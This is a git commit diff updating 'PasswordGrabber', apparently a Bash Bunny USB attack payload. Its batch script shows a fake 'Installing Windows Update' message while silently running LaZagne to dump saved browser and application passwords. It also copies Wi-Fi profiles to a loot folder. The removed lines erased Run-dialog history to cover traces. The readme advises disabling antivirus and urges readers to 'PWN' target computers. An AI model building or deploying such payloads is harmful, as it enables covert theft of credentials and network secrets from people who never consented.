Updating PasswordGrabber to make it more easily understandble (#293)

2017-11-20 04:15:12 +01:00 · 2017-11-20 04:15:12 +01:00 · f97b75983d
parent 2c49f6c09b
commit f97b75983d
3 changed files with 31 additions and 37 deletions
--- a/payloads/library/credentials/PasswordGrabber/e.cmd
+++ b/payloads/library/credentials/PasswordGrabber/e.cmd
@ -1,34 +1,20 @@
@echo off
@echo Installing Windows Update

-REM Delete registry keys storing Run dialog history
-REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
-
-REM Creates directory compromised of computer name, date and time
-REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
-
-REM This executes LaZagne in the current directory and outputs the password file to Loot
-REM Time and Date is also added
 setlocal
 cd /d %~dp0
-%~dp0\laZagne.exe all -vV > "%~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

-REM These lines if you just want Passwords and no files.
-set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+REM Time and Date
+set drec=%COMPUTERNAME%_%date%_%TIME: =0%
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%drec%
 mkdir %dst% >>nul

-if Exist %USERPROFILE%\Documents (
-REM /C Continues copying even if errors occur.
-REM /Q Does not display file names while copying.
-REM /G Allows the copying of encrypted files to destination that does not support encryption.
-REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
-REM /E Copies directories and subdirectories, including empty ones.
+REM This executes LaZagne in the current directory and outputs the password file to Loot
+%~dp0\laZagne.exe all -v > "%~dp0\..\..\loot\PasswordGrabber\%drec%\passwords.txt"

-REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
-
-REM Same as above but does not create empty directories
-REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul

+if Exist c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* (
+xcopy /C /Q /G /Y /E c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\* %dst% >>nul
 )

 REM Blink CAPSLOCK key
--- a/payloads/library/credentials/PasswordGrabber/payload.txt
+++ b/payloads/library/credentials/PasswordGrabber/payload.txt
@ -1,15 +1,15 @@
 #!/bin/bash
 #
-# Title:         USB Exfiltrator
-# Author:        Hak5Darren
-# Version:       1.1
-# Target:        Windows XP SP3+
-# Props:         Diggster, IMcPwn
-# Category:      Exfiltration
+# Title:         Password Grabber
+# Author:        Razerblade
+# Version:       1.2
+# Target:        Windows
+# Props:         Hak5Darren, TeCHemically, dragmus31
+# Category:      Credentials
 #
 # Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
 # which in turn executes e.cmd invisibly using i.vbs
-# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
+# which in turn steals credentials by using LaZagne and saves them to /Loot
 #
 LED SETUP
 GET SWITCH_POSITION
--- a/payloads/library/credentials/PasswordGrabber/readme.md
+++ b/payloads/library/credentials/PasswordGrabber/readme.md
@ -1,25 +1,33 @@
 # PasswordGrabber

 * Author: RazerBlade
-* Creds: Hak5Darren, AlessandroZ
-* Version: Version 1.1
-* Firmware support: 1.1
-* Target: Windows
+* Creds: Hak5Darren, AlessandroZ, TeCHemically, dragmus31
+* Version: Version 1.2
+* Firmware support: 1.1+
+* Target: Windows 7+

 ## Description

 Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
 This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
+This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
+
 Full read here: https://github.com/AlessandroZ/LaZagne
+Downloads here: https://github.com/AlessandroZ/LaZagne/releases


 ## Configuration
+1. You need to download the latest file from LaZagnes release page. 
+2. Unzip the exe file and place it in the payload folder. The payload folder should contain all the file that is in the Payload folder + LaZagne.exe
+3. Plug it in a computer and PWN them.
+
+Tips: You may need to disable antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
+
+## INFO
 By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
-I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
-
-Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
-When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!

+## DISCLAIMER
+Hak5 is not responsible for the execution of 3rd party binaries.
 ## STATUS

 | LED                | Status                                       |
@ -28,5 +36,5 @@ When compiled or downloaded, just drop it of to the PasswordGrabbers folder and
 | Green              | Attack Complete                              |

 ## Discussion
-[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
+[Hak5 Forum Thread] = https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/